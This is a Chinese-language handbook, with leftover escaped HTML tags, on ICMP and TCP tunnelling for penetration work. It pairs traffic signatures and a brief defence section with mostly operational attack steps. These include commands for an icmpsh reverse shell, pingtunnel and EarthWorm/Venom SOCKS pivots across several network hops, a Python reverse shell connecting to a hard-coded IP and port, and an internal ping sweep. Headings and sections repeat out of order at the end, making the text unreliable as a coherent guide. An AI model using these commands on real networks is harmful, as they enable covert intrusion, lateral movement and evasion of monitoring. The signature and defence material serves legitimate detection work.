隧道代理攻防技术手册<\/h1>

一、ICMP隧道技术<\/h2>

1. ICMP协议基础<\/h3>
ICMP(Internet Control Message Protocol)是Internet协议族中的网络层协议，用于在IP网络中传递控制消息和错误报告。<\/p>

2. ICMP隧道流量特征<\/h3>

正常ICMP流量<\/strong>：<\/p>

单位时间内数据包发送数量为一组<\/li>
Windows下Data字段长度32字节，Linux下48字节<\/li>
请求包和响应包长度相同<\/li>
Windows Data内容：abcdefghijklmnopqrstuvwabcdefghi<\/code><\/li>
Linux Data内容：!"01234567<\/code><\/li>
Type字段类型为0(应答)或8(请求)<\/li> <\/ul> <\/li>
异常ICMP隧道流量<\/strong>：<\/p> 请求包和响应包长度明显不同<\/li> Data字段包含明文敏感信息<\/li> 单位时间内数据包数量过大<\/li> Data字段长度非默认值<\/li> 包含会话key和访问信息<\/li> <\/ul> <\/li> <\/ul> 3. 常用ICMP隧道工具<\/h3> 3.1 icmpsh<\/h4> 一个简单的反向ICMP shell工具，不需要管理员权限即可运行。<\/p> 使用步骤<\/strong>：<\/p> 服务端设置(Kali)：<\/li> <\/ol> sysctl -w net.ipv4.icmp_echo_ignore_all=<\/span>1<\/span> <\/span><\/span>git clone https:\/\/github.com\/inquisb\/icmpsh.git <\/span><\/span>python2 icmpsh_m.py <服务端IP> <目标机IP> <\/span><\/span><\/code><\/pre> 客户端运行(Windows)：<\/li> <\/ol> icmpsh.exe -t <服务端IP> -d 500<\/span> -b 30<\/span> -s 128<\/span> <\/span><\/span><\/code><\/pre>参数说明<\/strong>：<\/p> -t<\/code>：主机IP地址(必需)<\/li> -r<\/code>：发送测试请求后退出<\/li> -d<\/code>：请求间延迟(毫秒)<\/li> -o<\/code>：响应超时(毫秒)<\/li> -b<\/code>：空白数量限制<\/li> -s<\/code>：最大数据缓冲区大小(字节)<\/li> <\/ul> 3.2 pingtunnel<\/h4> 通过ICMP发送TCP\/UDP流量的工具，需要管理员权限。<\/p> 使用步骤<\/strong>：<\/p> 服务端：<\/li> <\/ol> echo 1<\/span> > \/proc\/sys\/net\/ipv4\/icmp_echo_ignore_all <\/span><\/span>.\/pingtunnel -type server -noprint 1<\/span> -nolog 1<\/span> <\/span><\/span><\/code><\/pre> 客户端(设置SOCKS5)：<\/li> <\/ol> pingtunnel.exe -type client -l :4455 -s <服务端IP> -sock5 1<\/span> -noprint 1<\/span> -nolog 1<\/span> <\/span><\/span><\/code><\/pre>二、TCP隧道技术<\/h2> 1. TCP隧道流量特征<\/h3> 1.1 EarthWorm(EW)特征<\/h4> 建立连接时数据包特征：xx xx 00 00 00 00<\/code><\/li> 客户端发送：01 01 00 00 00 00<\/code><\/li> 服务端应答：01 02 00 00 00 00<\/code><\/li> <\/ul> 1.2 Venom特征<\/h4> 未加密时：<\/p> 建立连接时发送：00 00 00 00 00 00<\/code><\/li> 携带ABCDEFGH<\/code>判断协议<\/li> 使用VCMD<\/code>作为数据分割<\/li> 命令执行过程为明文<\/li> <\/ul> <\/li> 加密时：<\/p> 数据全置零<\/li> 不使用端口复用时才有特征<\/li> <\/ul> <\/li> <\/ul> 1.3 Stowaway特征<\/h4> 建立连接时发送：00 00 00 00 00 00<\/code><\/li> 包含明文信息： IAMADMINXD<\/code><\/li> IAMNEWHERE<\/code><\/li> THEREISNOROUTE<\/code><\/li> <\/ul> <\/li> 大量重复ACK确认请求(心跳保持)<\/li> <\/ul> 1.4 Frp特征<\/h4> 未加密时：<\/p> 携带版本架构信息<\/li> 传递会话ID和会话key<\/li> 创建SOCKS5信息<\/li> <\/ul> <\/li> TLS加密后：<\/p> 建立连接时携带0x17<\/code><\/li> 固定243字节TLS-hello报文<\/li> 服务端应答90字节TLS-hello报文<\/li> <\/ul> <\/li> <\/ul> 2. 常用TCP隧道工具<\/h3> 2.1 EarthWorm(EW)<\/h4> 下载地址<\/strong>：https:\/\/github.com\/idlefire\/ew<\/p> 命令格式<\/strong>：<\/p> ssocksd<\/code>：正向代理<\/li> rcsocks<\/code>：流量转发<\/li> rssocks<\/code>：SOCKS5反弹<\/li> lcx_slave<\/code>：端口绑定<\/li> lcx_listen<\/code>：流量转发<\/li> lcx_tran<\/code>：端口转发<\/li> <\/ul> 使用场景<\/strong>：<\/p> 公网出网<\/strong>：<\/li> <\/ol> .\/ew -s ssocksd -l 8888<\/span> <\/span><\/span><\/code><\/pre> 内网出网(反向代理)<\/strong>：<\/li> <\/ol> 服务端：<\/li> <\/ul> .\/ew -s rcsocks -l 1080<\/span> -e 8888<\/span> <\/span><\/span><\/code><\/pre> 客户端：<\/li> <\/ul> .\/ew -s rssocks -d <服务端IP> -e 8888<\/span> <\/span><\/span><\/code><\/pre> 二重网络环境<\/strong>：<\/li> <\/ol> 正向代理：<\/li> <\/ul> ew_for_Win.exe -s ssocksd -l 8888<\/span> <\/span><\/span><\/code><\/pre> 反向代理：<\/li> <\/ul> # 跳板机<\/span> <\/span><\/span>ew_for_Win.exe -s rcsocks -l 7766<\/span> -e 6677<\/span> <\/span><\/span># 内网机器<\/span> <\/span><\/span>ew_for_Win.exe -s rssocks -d 10.10.10.20 -e 6677<\/span> <\/span><\/span><\/code><\/pre> 三级网络代理<\/strong>：<\/li> <\/ol> VPS：<\/li> <\/ul> ew -s rcsocks -l 1080<\/span> -e 8888<\/span> <\/span><\/span><\/code><\/pre> 主机A：<\/li> <\/ul> ew -s lcx_slave -d 1.1.1.1 -e 8888<\/span> -f 2.2.2.3 -g 9999<\/span> <\/span><\/span><\/code><\/pre> 主机B：<\/li> <\/ul> ew -s lcx_listen -l 9999<\/span> -e 7777<\/span> <\/span><\/span><\/code><\/pre> 主机C：<\/li> <\/ul> ew -s rssocks -d 2.2.2.3 -e 7777<\/span> <\/span><\/span><\/code><\/pre>2.2 Venom<\/h4> 下载地址<\/strong>：https:\/\/github.com\/Dliv3\/Venom\/<\/p> 使用步骤<\/strong>：<\/p> 服务端：<\/li> <\/ol> admin_linux_x64 -lport 7000<\/span> -passwd qaxNB666 <\/span><\/span><\/code><\/pre> 客户端：<\/li> <\/ol> agent.exe -rhost <服务端IP> -rport 7000<\/span> -passwd qaxNB666 <\/span><\/span><\/code><\/pre> 开启SOCKS：<\/li> <\/ol> show <\/span><\/span>goto 1<\/span> <\/span><\/span>socks 1088<\/span> <\/span><\/span><\/code><\/pre>三、实战技巧<\/h2> 1. 反弹Shell示例<\/h3> import<\/span> socket,<\/span>subprocess,<\/span>os <\/span><\/span>s=<\/span>socket.<\/span>socket(socket.<\/span>AF_INET,socket.<\/span>SOCK_STREAM) <\/span><\/span>s.<\/span>connect(("192.168.200.160"<\/span>,4444<\/span>)) <\/span><\/span>os.<\/span>dup2(s.<\/span>fileno(),0<\/span>) <\/span><\/span>os.<\/span>dup2(s.<\/span>fileno(),1<\/span>) <\/span><\/span>os.<\/span>dup2(s.<\/span>fileno(),2<\/span>) <\/span><\/span>p=<\/span>subprocess.<\/span>call(["\/bin\/sh"<\/span>,"-i"<\/span>]) <\/span><\/span><\/code><\/pre>2. 判断Docker容器<\/h3> 检查.dockerenv<\/code>文件：<\/li> <\/ol> ls \/.dockerenv <\/span><\/span><\/code><\/pre> 检查\/proc\/1\/cgroup<\/code>：<\/li> <\/ol> cat \/proc\/1\/cgroup <\/span><\/span><\/code><\/pre>3. 内网主机发现<\/h3> for<\/span> i in $(<\/span>seq 1<\/span> 10)<\/span>; do<\/span> ping -c 1<\/span> 172.17.0.$i; done<\/span> <\/span><\/span><\/code><\/pre>四、防御建议<\/h2> 1. ICMP隧道防御<\/h3> 监控单位时间内ICMP数据包数量<\/li> 检查Data字段长度和内容<\/li> 限制ICMP协议的使用<\/li> <\/ul> 2. TCP隧道防御<\/h3> 监控异常端口连接<\/li> 检查协议特征(如EW的xx xx 00 00 00 00<\/code>)<\/li> 实施严格的网络访问控制<\/li> 启用TLS加密通信<\/li> <\/ul> 3. 通用防御措施<\/h3> 定期审计网络流量<\/li> 限制不必要的出站连接<\/li> 实施严格的权限控制<\/li> 监控异常进程和网络连接<\/li> <\/ul>

隧道代理攻防技术手册<\/h1>

一、ICMP隧道技术<\/h2>

1. ICMP协议基础<\/h3> ICMP(Internet Control Message Protocol)是Internet协议族中的网络层协议，用于在IP网络中传递控制消息和错误报告。<\/p>

3. 常用ICMP隧道工具<\/h3>

二、TCP隧道技术<\/h2>

1. TCP隧道流量特征<\/h3>

2. 常用TCP隧道工具<\/h3>

三、实战技巧<\/h2>

四、防御建议<\/h2>

3. 通用防御措施<\/h3> 定期审计网络流量<\/li> 限制不必要的出站连接<\/li> 实施严格的权限控制<\/li> 监控异常进程和网络连接<\/li> <\/ul>

1. ICMP协议基础<\/h3>
ICMP(Internet Control Message Protocol)是Internet协议族中的网络层协议，用于在IP网络中传递控制消息和错误报告。<\/p>

3. 通用防御措施<\/h3>

定期审计网络流量<\/li>
限制不必要的出站连接<\/li>
实施严格的权限控制<\/li>
监控异常进程和网络连接<\/li> <\/ul>